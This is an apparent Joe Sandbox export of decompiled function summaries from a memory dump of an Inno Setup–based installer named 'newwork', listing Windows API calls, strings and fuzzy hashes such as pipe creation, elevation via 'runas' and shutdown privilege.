• CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
• GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,021A3858,021A3858), ref: 004586CF
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
• SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
• CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
• CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
• CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
Similarity
• API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
• String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
• API String ID: 770386003-3271284199
• Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
• Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
• Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
• Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
APIs
  • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021A2BE0,?,?,?,021A2BE0,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
  • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
  • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BE0,?,?,?,021A2BE0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
  • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BE0,?,?,?,021A2BE0), ref: 004783CC
  • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,021A2BE0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
  • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,021A2BE0,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
• ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
• GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
• GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
• CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
Strings
Similarity
• API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
• String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
• API String ID: 883996979-221126205
• Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
• Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
• Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
• Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
APIs
• SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
• ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
Similarity
• API ID: MessageSendShowWindow
• String ID:
• API String ID: 1631623395-0
• Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
• Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
• Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
• Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
APIs
• IsIconic.USER32(?), ref: 00418393
• GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
• GetWindowRect.USER32(?), ref: 004183CC
• GetWindowLongA.USER32(?,000000F0), ref: 004183DA
• GetWindowLongA.USER32(?,000000F8), ref: 004183EF
• ScreenToClient.USER32(00000000), ref: 004183F8
• ScreenToClient.USER32(00000000,?), ref: 00418403
Strings
Similarity
• API ID: Window$ClientLongScreen$IconicPlacementRect
• String ID: ,
• API String ID: 2266315723-3772416878
• Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
• Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
• Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
• Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
• ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
Strings
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
• Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
• Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
• Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
• Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
APIs
• GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
• GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
• GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
• ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CryptVersion
                                                                                        • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                        • API String ID: 1951258720-508647305
                                                                                        • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                        • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                        • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                        • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                        • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirstNext
                                                                                        • String ID: isRS-$isRS-???.tmp
                                                                                        • API String ID: 134685335-3422211394
                                                                                        • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                        • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                        • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                        • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                        APIs
                                                                                        • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                        • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                        • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                        • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                        Strings
                                                                                        • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                        • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                        • API String ID: 2236967946-3182603685
                                                                                        • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                        • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                        • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                        • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                        • API String ID: 1646373207-3712701948
                                                                                        • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                        • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                        • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                        • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 00417D0F
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                        • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Placement$Iconic
                                                                                        • String ID: ,
                                                                                        • API String ID: 568898626-3772416878
                                                                                        • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                        • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                        • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                        • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                        • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseErrorFirstModeNext
                                                                                        • String ID:
                                                                                        • API String ID: 4011626565-0
                                                                                        • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                        • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                        • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                        • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                        • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseErrorFirstModeNext
                                                                                        • String ID:
                                                                                        • API String ID: 4011626565-0
                                                                                        • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                        • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                        • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                        • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                        • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 1177325624-0
                                                                                        • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                        • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                        • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                        • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 0048397A
• GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
• ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
• ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Window$Show$IconicLong
• String ID:
• API String ID: 2754861897-0
• Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
• Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
• Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
• Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
• FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
• FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
• Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
• Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
• Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
APIs
• IsIconic.USER32(?), ref: 004241E4
• SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
  • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
  • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021A25AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
• SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Window$ActiveFocusIconicShow
• String ID:
• API String ID: 649377781-0
• Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
• Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
• Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
• Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
APIs
• IsIconic.USER32(?), ref: 00417D0F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
• GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Window$Placement$Iconic
• String ID:
• API String ID: 568898626-0
